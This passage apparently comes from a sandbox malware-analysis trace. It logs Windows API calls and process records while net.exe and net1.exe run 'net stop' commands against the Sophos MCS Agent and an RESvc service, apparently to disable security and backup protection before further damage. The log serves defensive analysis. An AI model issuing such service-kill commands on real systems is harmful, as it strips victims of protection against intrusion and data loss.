lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x19 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET HELPMSG\r\nmessa", _MaxCount=0x12) returned 11 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0xc1 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET LOCALGROUP\r\n[g", _MaxCount=0x12) returned 7 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x16 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET PAUSE\r\nservice", _MaxCount=0x12) returned 3 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x33 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SESSION\r\n[\\\\co", _MaxCount=0x12) returned 15 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x234 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET SHARE\r\nsharena", _MaxCount=0x12) returned 12 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x13 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START BROWSER\r", _MaxCount=0x12) returned 14 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START CLIPBOOK", _MaxCount=0x12) returned 14 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x14 [0217.859] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START EVENTLOG", _MaxCount=0x12) returned 14 [0217.859] LocalFree (hMem=0x605620) returned 0x0 [0217.859] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="嘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START MESSENGE", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x605620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="瘠`⡋瓢\x1c嘠`\x1c") returned 0x15 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START NET LOGO", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x607620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c瘠`\x1c") returned 0x16 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCLOCAT", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x11 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START RPCSS\r\n", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x14 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SCHEDULE", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x12 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START SERVER\r\n", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xf [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START UPS\r\n", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x17 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START WORKSTAT", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x18 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET START\r\n[servic", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x2a [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STATISTICS\r\n[W", _MaxCount=0x12) returned 14 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.860] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x15 [0217.860] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET STOP\r\nservice\r", _MaxCount=0x12) returned 19 [0217.860] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x58 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET TIME\r\n\r\n[\\\\com", _MaxCount=0x12) returned -1 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x184 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USE\r\n[devicena", _MaxCount=0x12) returned -2 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xc7 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET USER\r\n[usernam", _MaxCount=0x12) returned -2 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x47 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET VIEW\r\n[\\\\compu", _MaxCount=0x12) returned -3 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xc2 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NET\r\n [ ACCOUNT", _MaxCount=0x12) returned 19 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x319 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SERVICES\r\nNET STAR", _MaxCount=0x12) returned -5 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x483 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="SYNTAX\r\nThe follow", _MaxCount=0x12) returned -5 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xa86 [0217.861] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="NAMES\r\nThe followi", _MaxCount=0x12) returned 4 [0217.861] LocalFree (hMem=0x609620) returned 0x0 [0217.861] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x54 [0217.862] _wcsnicmp (_String1="NET stop ΓÇ£Sophos", _String2="\r\nFor more informa", _MaxCount=0x12) returned 97 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xad [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET ACCO", _MaxCount=0x8) returned 18 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x2e [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET COMP", _MaxCount=0x8) returned 16 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x7d [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x26 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET CONF", _MaxCount=0x8) returned 16 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x19 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET CONT", _MaxCount=0x8) returned 16 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x1b [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET FILE", _MaxCount=0x8) returned 13 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xbe [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET GROU", _MaxCount=0x8) returned 12 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x33 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x19 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET HELP", _MaxCount=0x8) returned 11 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0xc1 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET LOCA", _MaxCount=0x8) returned 7 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x16 [0217.862] _wcsnicmp (_String1="NET stop", _String2="NET PAUS", _MaxCount=0x8) returned 3 [0217.862] LocalFree (hMem=0x609620) returned 0x0 [0217.862] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x33 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET SESS", _MaxCount=0x8) returned 15 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x234 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET SHAR", _MaxCount=0x8) returned 12 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x13 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x14 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x14 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x15 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x15 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="阠`⡋瓢\x1c阠`\x1c") returned 0x16 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x609620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="䴨`⡋瓢\x1c阠`\x1c") returned 0x11 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x604d28) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c䴨`\x1c") returned 0x14 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x60b620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0x12 [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x60b620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0xf [0217.863] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.863] LocalFree (hMem=0x60b620) returned 0x0 [0217.863] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0x17 [0217.864] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.864] LocalFree (hMem=0x60b620) returned 0x0 [0217.864] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0x18 [0217.864] _wcsnicmp (_String1="NET stop", _String2="NET STAR", _MaxCount=0x8) returned 14 [0217.864] LocalFree (hMem=0x60b620) returned 0x0 [0217.864] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0x2a [0217.864] _wcsnicmp (_String1="NET stop", _String2="NET STAT", _MaxCount=0x8) returned 14 [0217.864] LocalFree (hMem=0x60b620) returned 0x0 [0217.864] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a10000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0x1cf268, nSize=0x0, Arguments=0x1cf264 | out: lpBuffer="똠`⡋瓢\x1c똠`\x1c") returned 0x15 [0217.864] _wcsnicmp (_String1="NET stop", _String2="NET STOP", _MaxCount=0x8) returned 0 [0217.864] GetFileType (hFile=0x26c) returned 0x3 [0217.864] GetConsoleMode (in: hConsoleHandle=0x26c, lpMode=0x1cf280 | out: lpMode=0x1cf280) returned 0 [0217.864] GetConsoleOutputCP () returned 0x1b5 [0217.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0217.864] malloc (_Size=0x16) returned 0x102718 [0217.864] GetConsoleOutputCP () returned 0x1b5 [0217.864] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="NET STOP\r\nservice\r\n\r\n", cchWideChar=-1, lpMultiByteStr=0x102718, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NET STOP\r\nservice\r\n\r\n", lpUsedDefaultChar=0x0) returned 22 [0217.864] WriteFile (in: hFile=0x26c, lpBuffer=0x102718, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x1cf284, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1cf284, lpOverlapped=0x0) returned 0 [0217.865] free (_Block=0x102718) [0217.865] LocalFree (hMem=0x60b620) returned 0x0 [0217.865] NetApiBufferFree (Buffer=0x601c90) returned 0x0 [0217.865] NetApiBufferFree (Buffer=0x601ca8) returned 0x0 [0217.865] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop ΓÇ£Sophos MCS AgentΓÇ¥ /y" [0217.865] exit (_Code=1) Process: id = "372" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x54a66000" os_pid = "0x73c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop RESvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 547 os_tid = 0x11c Process: id = "373" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x539d7000" os_pid = "0x814" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "372" os_parent_pid = "0x73c" cmd_line = "C:\\Windows\\system32\\net1 stop RESvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 548 os_tid = 0x2c8 [0218.011] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efdb8 | out: lpSystemTimeAsFileTime=0x2efdb8*(dwLowDateTime=0x4b217860, dwHighDateTime=0x1d57a87)) [0218.011] GetCurrentProcessId () returned 0x814 [0218.011] GetCurrentThreadId () returned 0x2c8 [0218.011] GetTickCount () returned 0x11700ad [0218.011] QueryPerformanceCounter (in: lpPerformanceCount=0x2efdb0 | out: lpPerformanceCount=0x2efdb0*=33829593817) returned 1 [0218.012] GetModuleHandleA (lpModuleName=0x0) returned 0x590000 [0218.012] __set_app_type (_Type=0x1) [0218.012] __p__fmode () returned 0x74eb31f4 [0218.012] __p__commode () returned 0x74eb31fc [0218.012] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x59ffe6) returned 0x0 [0218.012] __getmainargs (in: _Argc=0x5a9064, _Argv=0x5a906c, _Env=0x5a9068, _DoWildCard=0, _StartInfo=0x5a9024 | out: _Argc=0x5a9064, _Argv=0x5a906c, _Env=0x5a9068) returned 0 [0218.012] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.012] GetConsoleOutputCP () returned 0x1b5 [0218.013] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x5a9080 | out: lpCPInfo=0x5a9080) returned 1 [0218.013] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.016] sprintf_s (in: _DstBuf=0x2efd70, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0218.016] setlocale (category=0, locale=".437") returned="English_United States.437" [0218.018] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0218.018] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0218.018] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop RESvc /y" [0218.018] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2efb3c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" 